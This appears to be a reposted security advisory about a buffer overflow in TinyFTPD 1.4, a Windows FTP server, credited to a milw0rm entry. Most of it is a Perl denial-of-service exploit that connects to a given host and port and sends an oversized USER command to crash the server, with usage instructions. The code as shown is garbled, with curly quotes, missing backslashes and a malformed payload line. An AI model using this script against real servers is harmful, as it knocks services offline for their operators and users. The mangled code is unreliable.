‘TinyFTPD USER Buffer Overflow DoS (Exploit)’

Summary

‘Tiny FTPd, is a Windows NT family FTP server.

Tiny FTPd contains a buffer overflow condition that allows remote attackers to perform DoS attacks on the server.’

Credit:

‘The original article can be found at: http://www.milw0rm.com/exploits/1758


Details

Vulnerable Systems:
 * TinyFTPD version 1.4

Exploit:
#!/bin/perl
#
# Title: TinyFTPD <= 1.4 USER command D.O.S
# Credits: [Oo]
#
#
use IO::Socket;

print ‘[i] TinyFTPD <= 1.4 USER command D.O.Sn’;
print ‘[i] coded by [Oo]n’;

if (@ARGV < 2)
{
 print ‘n[*] Usage: tinyftpd_dos.pl host portn’;
 print ‘[*] Exemple: tinyftpd_dos.pl 192.168.0.1 21n’;
 exit;
}

$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = ‘(A’ x 9000;

$socket = IO::Socket::INET->new( Proto => ‘tcp’, PeerAddr => ‘$ip’, PeerPort => ‘$port’) || die ‘n[-] Connecting: Failed!n’;
print ‘n[+] Connecting: Ok!n’;
print ‘[+] Sending bad request…n’;

print $socket ‘USER $exploitn’;
sleep(5);
close($socket);

print ‘[?] DoSed?n’;’

Categories: Exploits